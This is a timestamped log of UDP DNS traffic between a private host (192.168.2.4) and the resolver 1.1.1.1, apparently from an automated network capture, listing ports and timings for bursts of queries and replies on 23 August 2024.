Aug 23, 2024 18:47:51.366877079 CEST	56081	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.367105007 CEST	61851	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.380711079 CEST	53	49479	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.382843971 CEST	53	61851	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.391834021 CEST	51742	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.392292976 CEST	52810	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.392748117 CEST	49239	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.393328905 CEST	57789	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.394006968 CEST	50919	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.394202948 CEST	55325	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.395661116 CEST	57233	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.395972967 CEST	53743	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.396464109 CEST	57325	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.396706104 CEST	51825	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.397229910 CEST	58536	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.400676012 CEST	54480	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.402334929 CEST	53	56081	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.403281927 CEST	53	51742	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.403822899 CEST	61681	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.404377937 CEST	50995	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.404891968 CEST	54779	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.407036066 CEST	53	49239	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.407391071 CEST	53	55325	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.408199072 CEST	60176	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.408288002 CEST	53	53743	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.408364058 CEST	53315	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.408432961 CEST	53	51825	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.408693075 CEST	53	57233	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.409169912 CEST	61082	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.410000086 CEST	53	58536	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.410078049 CEST	53421	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.410379887 CEST	57773	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.410552025 CEST	52689	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.411303043 CEST	56575	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.411427021 CEST	65063	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.411681890 CEST	60375	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.411827087 CEST	55273	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.411995888 CEST	51034	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.412136078 CEST	51986	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.412276030 CEST	58103	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.412410975 CEST	60948	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.412549973 CEST	59361	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.412842035 CEST	65513	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.413053036 CEST	54377	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.413259983 CEST	50662	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.413456917 CEST	53636	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.413618088 CEST	64886	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.413866043 CEST	63363	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.414082050 CEST	54594	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.414326906 CEST	59828	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.414474964 CEST	53	61681	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.414484978 CEST	51722	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.414485931 CEST	53	54480	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.414680958 CEST	53427	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:51.416266918 CEST	53	54779	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.419214010 CEST	53	53315	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.427866936 CEST	53	60176	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.429327011 CEST	53	58103	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.430444956 CEST	53	53421	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.430454969 CEST	53	55273	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.430464029 CEST	53	65513	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.430537939 CEST	53	51034	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.430548906 CEST	53	52689	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.430557966 CEST	53	54377	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.431432962 CEST	53	52810	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.431546926 CEST	53	53636	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.431564093 CEST	53	63363	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.433495998 CEST	53	53427	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.433680058 CEST	53	57325	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.436259031 CEST	53	50995	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.441755056 CEST	53	61082	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.443815947 CEST	53	60375	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.445029020 CEST	53	56575	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.453041077 CEST	53	57773	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.454531908 CEST	53	59361	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.454894066 CEST	53	60948	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.457484961 CEST	53	64886	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.458055019 CEST	53	51722	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.545270920 CEST	53	59828	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.551512957 CEST	53	50919	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.567964077 CEST	53	65063	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.570564032 CEST	53	51986	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.594535112 CEST	53	57789	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.594923019 CEST	53	54594	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:51.616799116 CEST	53	50662	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:52.012447119 CEST	53	65203	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:52.356703043 CEST	52522	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:47:53.336301088 CEST	53	52522	1.1.1.1	192.168.2.4
Aug 23, 2024 18:47:53.338781118 CEST	53	52522	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.532422066 CEST	61009	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.533051968 CEST	62685	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.533533096 CEST	61048	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.533934116 CEST	65183	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.534445047 CEST	52821	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.534647942 CEST	57066	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.534981012 CEST	64554	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.535273075 CEST	63158	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.535805941 CEST	64050	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.536309004 CEST	65256	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.536780119 CEST	51066	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.537252903 CEST	61700	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.537744045 CEST	54060	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.538258076 CEST	49507	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.538535118 CEST	63629	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.538619995 CEST	56943	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.539277077 CEST	63388	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.539380074 CEST	49616	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.539788008 CEST	56506	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.539908886 CEST	62156	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.540429115 CEST	64288	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.540445089 CEST	63941	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.541172981 CEST	49844	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.541276932 CEST	56812	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.541687012 CEST	49329	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.541906118 CEST	56377	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.541966915 CEST	54923	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.542490959 CEST	55447	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.542979956 CEST	61697	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.543459892 CEST	65269	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.543915033 CEST	57430	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.544610977 CEST	61347	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.545221090 CEST	56568	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.545670986 CEST	53795	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.545670986 CEST	60314	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.546268940 CEST	57627	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.546375036 CEST	56960	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.546998024 CEST	59086	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.547115088 CEST	62828	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.547662973 CEST	55338	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.547696114 CEST	61613	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.548439026 CEST	54647	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.548501968 CEST	54899	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.549005032 CEST	63309	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.549027920 CEST	52892	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.549457073 CEST	56951	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.550235987 CEST	64117	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.550261974 CEST	57769	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.550414085 CEST	50526	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.550757885 CEST	51898	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.551069021 CEST	64244	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.551326036 CEST	57595	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.551631927 CEST	50623	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.551915884 CEST	50532	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.552206039 CEST	51846	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.552534103 CEST	62680	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.552707911 CEST	59080	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.553390980 CEST	58213	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.553432941 CEST	62679	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.553545952 CEST	54240	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.553580999 CEST	63382	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.553741932 CEST	56777	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.553778887 CEST	60173	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.553950071 CEST	61145	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:23.566001892 CEST	53	61048	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.566499949 CEST	53	62685	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.566510916 CEST	53	52821	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.567435980 CEST	53	63158	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.567449093 CEST	53	65183	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.567459106 CEST	53	57066	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.570135117 CEST	53	61009	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.570143938 CEST	53	64050	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.570148945 CEST	53	64554	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.575299025 CEST	53	56506	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.576596975 CEST	53	49329	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.576606989 CEST	53	56943	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.579988003 CEST	53	61347	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.579998970 CEST	53	56812	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.580007076 CEST	53	62156	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.580017090 CEST	53	56377	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.580028057 CEST	53	64288	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.580038071 CEST	53	50526	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.580053091 CEST	53	61700	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.580061913 CEST	53	54899	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.581974983 CEST	53	59086	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.581990004 CEST	53	49507	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.581998110 CEST	53	49844	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.582007885 CEST	53	61697	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.582016945 CEST	53	51066	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.582031012 CEST	53	56960	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.582041979 CEST	53	49616	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585547924 CEST	53	53795	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585558891 CEST	53	60314	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585566998 CEST	53	55338	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585577011 CEST	53	63388	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585587025 CEST	53	50623	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585597038 CEST	53	57430	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585606098 CEST	53	51846	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585614920 CEST	53	57769	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585623980 CEST	53	62680	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585634947 CEST	53	51898	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585644960 CEST	53	50532	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.585654974 CEST	53	62679	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.587439060 CEST	53	59080	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.587449074 CEST	53	63382	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.587456942 CEST	53	56777	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.594266891 CEST	53	61145	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.605444908 CEST	53	55447	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.607804060 CEST	53	54923	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.607814074 CEST	53	54647	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.607821941 CEST	53	63941	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.607831955 CEST	53	56951	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.607841015 CEST	53	63629	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.607851028 CEST	53	63309	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.607858896 CEST	53	64244	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.607868910 CEST	53	57595	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.609394073 CEST	53	54240	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.609404087 CEST	53	61613	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.609411001 CEST	53	65256	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.612293005 CEST	53	60173	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.612303019 CEST	53	62828	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.612310886 CEST	53	52892	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.614573956 CEST	53	56568	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.730348110 CEST	53	64117	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.734112978 CEST	53	65269	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.734123945 CEST	53	58213	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.781593084 CEST	53	57627	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:23.915221930 CEST	53	54060	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.646929979 CEST	51244	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.647690058 CEST	50882	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.647738934 CEST	49774	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.648318052 CEST	58933	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.648344994 CEST	50451	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.648857117 CEST	53885	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.649350882 CEST	50216	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.649350882 CEST	49573	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.649388075 CEST	58096	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.649848938 CEST	62337	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.650068998 CEST	60428	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.650135040 CEST	58715	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.650614023 CEST	51036	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.650877953 CEST	62745	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.650877953 CEST	61884	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.651424885 CEST	56291	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.651453018 CEST	59092	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.651912928 CEST	52164	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.651912928 CEST	52024	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.652369976 CEST	54700	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.652385950 CEST	54822	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.652862072 CEST	62371	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.653084040 CEST	51784	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.653115034 CEST	62522	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.653743029 CEST	53747	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.653798103 CEST	60107	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.654268980 CEST	55973	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.654524088 CEST	59920	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.654540062 CEST	56280	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.655134916 CEST	52659	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.655210018 CEST	60175	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.655596972 CEST	61541	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.655936003 CEST	59965	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.657912970 CEST	51438	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.658529997 CEST	53	58933	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.658724070 CEST	58435	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.658806086 CEST	59999	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.658924103 CEST	55995	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.659145117 CEST	64820	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.659216881 CEST	51517	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.659421921 CEST	56117	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.659533978 CEST	58039	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.659636974 CEST	60950	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.659724951 CEST	52636	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.659838915 CEST	64983	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.659904957 CEST	51666	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.660031080 CEST	53380	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.660099983 CEST	61132	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.660209894 CEST	58102	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.660306931 CEST	52823	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.660381079 CEST	61709	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.660496950 CEST	60462	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.660548925 CEST	51723	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.660708904 CEST	53	49573	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.660722971 CEST	54394	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.660747051 CEST	51835	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.660923004 CEST	61414	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.660960913 CEST	63409	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.661130905 CEST	57104	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.661317110 CEST	65446	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.661343098 CEST	54272	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.661494017 CEST	52439	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.661560059 CEST	55758	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.661572933 CEST	53	58096	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.661711931 CEST	53115	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.661750078 CEST	54208	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.661906958 CEST	54713	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.664479017 CEST	53	52659	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.665087938 CEST	53	51036	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.665147066 CEST	53	53747	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.668163061 CEST	53	52164	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.668174982 CEST	53	60107	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.668184996 CEST	53	51784	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.668195009 CEST	53	62745	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.668205023 CEST	53	56291	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.668216944 CEST	53	55973	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.668226004 CEST	53	54822	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.668237925 CEST	53	59965	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.668247938 CEST	53	56280	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.671494007 CEST	53	61541	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.671506882 CEST	53	62522	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.671514988 CEST	53	59999	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.671519995 CEST	53	58435	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.671809912 CEST	53	52636	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674671888 CEST	53	53380	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674681902 CEST	53	51517	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674690962 CEST	53	57104	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674700975 CEST	53	61132	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674710035 CEST	53	52823	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674720049 CEST	53	64983	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674730062 CEST	53	64820	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674738884 CEST	53	54272	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674748898 CEST	53	51723	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674757957 CEST	53	58102	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674767971 CEST	53	60950	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674778938 CEST	53	51835	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674787998 CEST	53	52439	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674798012 CEST	53	61414	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674802065 CEST	53	63409	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674806118 CEST	53	54394	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.674814939 CEST	53	51666	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.679560900 CEST	53	50451	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.679907084 CEST	53	51244	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.685398102 CEST	53	59092	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.686088085 CEST	53	53885	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.688172102 CEST	53	60428	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.688184023 CEST	53	58715	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.688193083 CEST	53	54700	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.688203096 CEST	53	62337	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.688213110 CEST	53	60175	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.688222885 CEST	53	50882	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.690166950 CEST	53	51438	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.692697048 CEST	53	55995	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.692831993 CEST	53	58039	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:35.694346905 CEST	61987	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:35.696636915 CEST	53	56117	1.1.1.1	192.168.2.4
